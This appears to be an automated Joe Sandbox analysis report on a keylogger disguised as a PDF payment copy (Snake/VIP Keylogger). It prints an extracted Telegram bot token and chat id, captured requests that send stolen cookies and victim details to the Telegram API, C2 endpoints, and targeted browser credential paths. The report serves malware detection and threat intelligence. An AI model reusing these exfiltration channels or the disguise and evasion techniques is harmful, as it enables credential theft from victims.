Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Swift Copy TT USDUSD$23,401.PDF.exe

Overview

General Information

Sample name:Swift Copy TT USDUSD$23,401.PDF.exe
Analysis ID:1608142
MD5:4c1cc99d52126a69b0b94f56e17678e3
SHA1:c16d14509fbcdcd2e01c09af49ae9876e5200955
SHA256:47af16cc5a248cf055155a57d1eb07844113a00c7a84802588ef7dc5f007880d
Tags:exeSWIFTuser-cocaman
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA", "Chat id": "7128988401", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA", "Chat_id": "7128988401", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2e112:$a1: get_encryptedPassword
          • 0x2e43b:$a2: get_encryptedUsername
          • 0x2df22:$a3: get_timePasswordChanged
          • 0x2e02b:$a4: get_passwordField
          • 0x2e128:$a5: set_encryptedPassword
          • 0x2f7e2:$a7: get_logins
          • 0x2f745:$a10: KeyLoggerEventArgs
          • 0x2f3aa:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2c512:$a1: get_encryptedPassword
                • 0x2c83b:$a2: get_encryptedUsername
                • 0x2c322:$a3: get_timePasswordChanged
                • 0x2c42b:$a4: get_passwordField
                • 0x2c528:$a5: set_encryptedPassword
                • 0x2dbe2:$a7: get_logins
                • 0x2db45:$a10: KeyLoggerEventArgs
                • 0x2d7aa:$a11: KeyLoggerEventArgsEventHandler
                0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3a2a1:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x39944:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x39ba1:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3a580:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 27 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious Double Extension File Execution
                Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe", CommandLine: "C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe", CommandLine|base64offset|contains: r, Image: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe, NewProcessName: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe, OriginalFileName: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe", ProcessId: 6716, ProcessName: Swift Copy TT USDUSD$23,401.PDF.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-06T09:21:10.027664+010028033053Unknown Traffic192.168.2.449737104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-06T09:21:07.101757+010028032742Potentially Bad Traffic192.168.2.449734132.226.247.7380TCP
                2025-02-06T09:21:09.393545+010028032742Potentially Bad Traffic192.168.2.449734132.226.247.7380TCP
                2025-02-06T09:21:10.758017+010028032742Potentially Bad Traffic192.168.2.449739132.226.247.7380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-06T09:21:29.160296+010018100081Potentially Bad Traffic192.168.2.449760149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-06T09:21:23.102526+010018100071Potentially Bad Traffic192.168.2.449755149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA", "Chat_id": "7128988401", "Version": "4.4"}
                Source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA", "Chat id": "7128988401", "Version": "4.4"}
                Source: Swift Copy TT USDUSD$23,401.PDF.exe.5804.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA/sendMessage"}
                Multi AV Scanner detection for submitted file
                Source: Swift Copy TT USDUSD$23,401.PDF.exeVirustotal: Detection: 47%Perma Link
                Source: Swift Copy TT USDUSD$23,401.PDF.exeReversingLabs: Detection: 34%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Swift Copy TT USDUSD$23,401.PDF.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49735 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: YuCz.pdbSHA256 source: Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Binary string: YuCz.pdb source: Swift Copy TT USDUSD$23,401.PDF.exe
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 010CF45Dh2_2_010CF2C0
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 010CF45Dh2_2_010CF4AC
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 010CFC19h2_2_010CF961
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069A3308h2_2_069A2EF0
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069A2D41h2_2_069A2A90
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069A3308h2_2_069A2EE7
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_069A0673
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069AD919h2_2_069AD670
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069AEA79h2_2_069AE7D0
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069AE1C9h2_2_069ADF20
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069AF781h2_2_069AF4D8
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069AEED1h2_2_069AEC28
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069AD069h2_2_069ACDC0
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069ADD71h2_2_069ADAC8
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069AD4C1h2_2_069AD218
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069A3308h2_2_069A3236
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069A0D0Dh2_2_069A0B30
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069A16F8h2_2_069A0B30
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069AE621h2_2_069AE378
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069AF329h2_2_069AF080
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_069A0853
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_069A0040
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 4x nop then jmp 069AFBD9h2_2_069AF930

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49760 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49755 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.4:57156 -> 162.159.36.2:53
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2006/02/2025%20/%2020:31:18%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA/sendDocument?chat_id=7128988401&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd474b275f999bHost: api.telegram.orgContent-Length: 7046
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.64.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49735 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2006/02/2025%20/%2020:31:18%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
                Source: unknownHTTP traffic detected: POST /bot7806240927:AAGovO05VYlSynI1cuzrN-7N9HltfEtnYLA/sendDocument?chat_id=7128988401&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd474b275f999bHost: api.telegram.orgContent-Length: 7046
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 06 Feb 2025 08:21:23 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002EAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Swift Copy TT USDUSD$23,401.PDF.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1677485048.0000000006DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
